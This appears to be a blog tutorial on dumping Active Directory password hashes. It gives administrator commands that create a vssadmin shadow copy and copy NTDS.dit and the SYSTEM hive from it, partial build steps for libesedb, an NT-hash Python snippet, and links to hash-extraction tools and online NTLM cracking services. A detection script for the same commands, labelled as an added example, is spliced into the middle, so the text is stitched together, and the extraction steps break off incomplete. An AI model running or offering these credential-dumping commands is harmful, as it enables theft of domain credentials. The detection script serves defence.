One of the most reliable ways to gather system hashes is to use vssadmin to create a shadow copy of the system drive and then copy the files from it. These files are typically locked and protected by the system, so recovering them from the backup is among the easiest methods. The caveat here is that you must be an administrator.
Step 1: Gather the data
Run cmd as administrator:
vssadmin list shadows
vssadmin create shadow /For=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\Windows\NTDS\NTDS.dit c:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\Windows\System32\config\SYSTEM C:\
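Seen from the monitoring side, the Step 1 commands leave a trail in process-creation logs. The sketch below is an added example, not part of the original post: it triages command lines for shadow copy creation and for NTDS.dit or the SYSTEM hive being read from a shadow copy path. The record layout, host names and user names are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed process-creation records (host, user, command line); not real logs.
SAMPLE_EVENTS = [
    ("DC01", "CORP\\alice", r"vssadmin list shadows"),
    ("DC01", "CORP\\alice", r"vssadmin  create shadow /For=c:"),
    ("DC01", "CORP\\alice",
     r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\Windows\NTDS\NTDS.dit C:\temp"),
    ("FS02", "CORP\\backupsvc", r'"C:\Windows\System32\vssadmin.exe" create shadow /for=D:'),
    ("WS03", "CORP\\bob", r"vssadmin list shadows"),
    ("WS03", "CORP\\bob", r"cmd /c copy C:\Windows\System32\config\SYSTEM.bak C:\temp"),
]

# vssadmin.exe is a real process, so "create shadow" is visible to
# process-creation logging when that logging is enabled.
CREATE_SHADOW = re.compile(r'\bvssadmin(?:\.exe)?"?\s+create\s+shadow\b', re.I)
# `copy` typed into an interactive cmd is a shell builtin and creates no
# process; this only fires when the path appears on some command line.
SHADOW_FILE = re.compile(
    r"harddiskvolumeshadowcopy\d*\\\S*\\(?:ntds\.dit|config\\system)\b", re.I)

def triage(events):
    """Group hits per (host, user); the file-from-shadow signal outranks creation."""
    hits = defaultdict(lambda: {"severity": None, "commands": []})
    for host, user, cmdline in events:
        created = bool(CREATE_SHADOW.search(cmdline))
        copied = bool(SHADOW_FILE.search(cmdline))
        if not (created or copied):
            continue
        entry = hits[(host, user)]
        entry["commands"].append(cmdline)
        if copied:
            entry["severity"] = "high"
        elif entry["severity"] is None:
            entry["severity"] = "medium"
    return dict(hits)

if __name__ == "__main__":
    for (host, user), entry in triage(SAMPLE_EVENTS).items():
        print(f"[{entry['severity']}] {host} {user}")
        for cmd in entry["commands"]:
            print("    " + cmd)
```

A "medium" result on its own is often legitimate backup activity; on a domain controller it warrants checking who ran it and what followed.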
Step 2: Installing the tools
We are going to need some tools:
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./synclibs.sh
./autogen.sh
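I know I usually want to perform a sanity check to make sure I am getting the right hash. The quickest might be to use a snippet of Python to check.
import hashlib, binascii
# The NT hash is MD4 over the UTF-16LE encoded password.
# hashlib's 'md4' comes from OpenSSL and raises ValueError where the legacy provider is disabled.
nt_hash = hashlib.new('md4', "thisismyhashvalue".encode('utf-16le')).digest()
print(binascii.hexlify(nt_hash).decode())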
- https://hashc.co.uk/
- https://github.com/libyal/libesedb/wiki/Building
- http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip
- http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_3_beta.zip
- https://hashkiller.co.uk/ntlm-decrypter.aspx
- https://gpuhash.me/
- https://TMTO.org